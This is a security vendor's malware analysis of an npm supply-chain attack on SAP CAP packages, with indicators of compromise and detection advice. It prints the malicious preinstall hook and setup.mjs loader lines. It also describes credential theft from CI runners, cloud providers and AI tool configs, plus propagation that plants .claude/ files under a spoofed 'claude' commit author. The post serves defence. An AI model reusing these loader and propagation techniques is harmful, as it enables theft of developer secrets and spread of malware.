Mini Shai-Hulud Targets SAP npm Packages With a Bun-Based Secret Stealer

A new npm supply-chain compromise is targeting the SAP developer ecosystem.

The affected packages we are tracking so far are:

• @cap-js/sqlite - v2.2.2
• @cap-js/postgres - v2.2.2
• @cap-js/db-service - v2.10.1
• mbt@1.2.48

The pattern is familiar but also a bit different: a trusted package receives a new preinstall hook, the hook runs a new setup.mjs file, and that loader downloads the Bun JavaScript runtime to execute a large obfuscated payload named execution.js.

The payload is an 11.7 MB credential stealer and propagation framework. It harvests local developer credentials, GitHub and npm tokens, GitHub Actions secrets, and cloud secrets from AWS, Azure, GCP, and Kubernetes. It then exfiltrates encrypted results through public GitHub repositories.

The malware names those repositories with a hardcoded description:

A Mini Shai-Hulud has Appeared


What Happened

The compromised packages use npm lifecycle execution. In what we’ve seen so far, package.json was modified to add:

"scripts": {
    "preinstall": "node setup.mjs"
}

That means the malicious code runs automatically during npm install, before the install has even completed.

The malicious package adds two files:

• setup.mjs
• execution.js

The normal package code still looks like the legitimate SAP package. In the @cap-js/sqlite@2.2.2 sample, the ordinary files match clean @cap-js/sqlite@2.2.1 byte-for-byte. The compromise is the install hook plus the added payload files.

How The Malware Runs

The first stage, setup.mjs, is a Bun bootstrapper. It checks the operating system and architecture, downloads Bun 1.3.13 from GitHub when needed, extracts the binary, and uses Bun to run execution.js.

const BUN_VERSION = '1.3.13';
const ENTRY_SCRIPT = 'execution.js';
const url = `https://github.com/oven-sh/bun/releases/download/bun-v${BUN_VERSION}/${asset}.zip`;
execFileSync(binPath, [entryScriptPath], { stdio: 'inherit', cwd: SCRIPT_DIR });

‍The second stage, execution.js, is a single large obfuscated payload. It uses a custom string scrambling layer labeled ctf-scramble-v2, checks whether it is running in CI, exits on Russian locale settings, and daemonizes itself on non-CI machines.

What It Steals

The payload is built to hit both developer laptops and CI/CD runners.

It attempts to collect:

• GitHub tokens, including output from gh auth token
• npm tokens from .npmrc
• environment variables
• GitHub Actions secrets
• AWS STS identity, Secrets Manager secrets, and SSM parameters
• Azure subscriptions, Key Vault names, and Key Vault secret values
• GCP project identity and Secret Manager values
• Kubernetes service account tokens
• Claude config, MCP config, GCP token databases, Azure token caches, Signal config, Electrum wallets, and VPN config files

The GitHub Actions path is especially concerning. The payload includes an embedded Python helper that searches /proc for the Runner.Worker process, reads its memory, and extracts masked secret structures from the runner.

GitHub Exfiltration And Propagation Keyword

The malware uses GitHub as its exfiltration channel.

The new propagation keyword is:

OhNoWhatsGoingOnWithGitHub

The malware searches GitHub commits for this string and uses matching commit messages as a token dead-drop. Commit messages matching OhNoWhatsGoingOnWithGitHub:<base64> are decoded into GitHub tokens and checked for repository access.

When the malware can create a repository, it uses randomized Dune-themed names, sets the repository description to:

A Mini Shai-Hulud has Appeared

and writes encrypted result files under:

results/results-<timestamp>-<counter>.json

The data is compressed and encrypted before commit using AES-256-GCM, with the AES key wrapped by an embedded RSA public key.

Propagation Logic

The payload contains logic for spreading through developer and release workflows.

In the analyzed samples, the malware checks for GitHub Actions release automation related to cap-js/cds-dbs. If it sees a release workflow in that repository context, it can modify a package tarball by:

• copying the current payload into execution.js
• writing setup.mjs
• setting scripts.preinstall = "node setup.mjs"
• incrementing the patch version
• repacking the tarball

It also attempts to use stolen GitHub Actions tokens to push files into repositories:

• .vscode/tasks.json
• .vscode/setup.mjs
• .claude/execution.js
• .claude/setup.mjs
• .claude/settings.json

Those commits use:

chore: update dependencies

with the author:

claude <claude@users.noreply.github.com>

SAP As a Target

The targeted packages sit in normal SAP development workflows. @cap-js/sqlite, @cap-js/postgres, and @cap-js/db-service are part of the SAP CAP database ecosystem, while mbt is used around SAP Cloud MTA build workflows.

That makes this campaign small in package count but potentially high impact. These packages are likely to run on developer machines and CI runners that have access to GitHub, npm, cloud credentials, and enterprise deployment secrets.

Detection And Mitigation

Search lockfiles, package caches, CI logs, internal registries, artifact stores, and developer machines for:

• @cap-js/sqlite - v2.2.2
• @cap-js/postgres - v2.2.2
• @cap-js/db-service - v2.10.1
• mbt@1.2.48
• setup.mjs
• execution.js
• preinstall scripts running node setup.mjs
• Bun 1.3.13 downloads during package installation

Search GitHub for:

• commit search results for OhNoWhatsGoingOnWithGitHub: https://github.com/search?q=OhNoWhatsGoingOnWithGitHub&type=commits
• repositories with description A Mini Shai-Hulud has Appeared
• commits containing OhNoWhatsGoingOnWithGitHub
• commits titled chore: update dependencies
• commits authored by claude <claude@users.noreply.github.com>
• unexpected .claude/ or .vscode/setup.mjs files
• results/results-*.json files in newly created public repositories

If any affected package was installed, rotate secrets. Do not limit rotation to npm tokens. The payload targets GitHub, npm, cloud providers, Kubernetes, CI secrets, and local developer tooling.

How Aikido Detects This

If you are an Aikido user, check your central feed and filter on malware issues. This will surface as a 100/100 critical issue. Aikido rescans nightly, but we recommend triggering a manual rescan now.

If you are not yet an Aikido user, you can create an account and connect your repos. Our malware coverage is included in the free plan, no credit card required.

For broader coverage across your whole team, Aikido's Endpoint Protection gives you visibility and control over the software packages installed on your team's devices. It covers browser extensions, code libraries, IDE plugins, and build dependencies, all in one place. Stop malware before it gets installed.

For future protection, consider Aikido Safe Chain (open source). Safe Chain sits in your existing workflow, intercepting npm, npx, yarn, pnpm, and pnpx commands and checking packages against Aikido Intel before install.

Indicators Of Compromise

Affected packages:

• @cap-js/sqlite - v2.2.2
• @cap-js/postgres - v2.2.2
• @cap-js/db-service - v2.10.1
• mbt@1.2.48

Hashes from the analyzed @cap-js/sqlite@2.2.2 sample:

• setup.mjs: 4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34
• execution.js: 6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95
• embedded GitHub runner memory dumper: 29ac906c8bd801dfe1cb39596197df49f80fff2270b3e7fbab52278c24e4f1a7

Strings and markers:

• A Mini Shai-Hulud has Appeared
• OhNoWhatsGoingOnWithGitHub (propagation keyword / GitHub commit dead-drop marker)
• ctf-scramble-v2
• tmp.987654321.lock
• chore: update dependencies
• claude@users.noreply.github.com

URLs and endpoints:

• hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/
• hxxps://api.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub&sort=author-date&order=desc&per_page=50
• hxxp://169.254.169.254
• hxxp://169.254.170.2
• hxxp://[fd00:ec2::254]

‍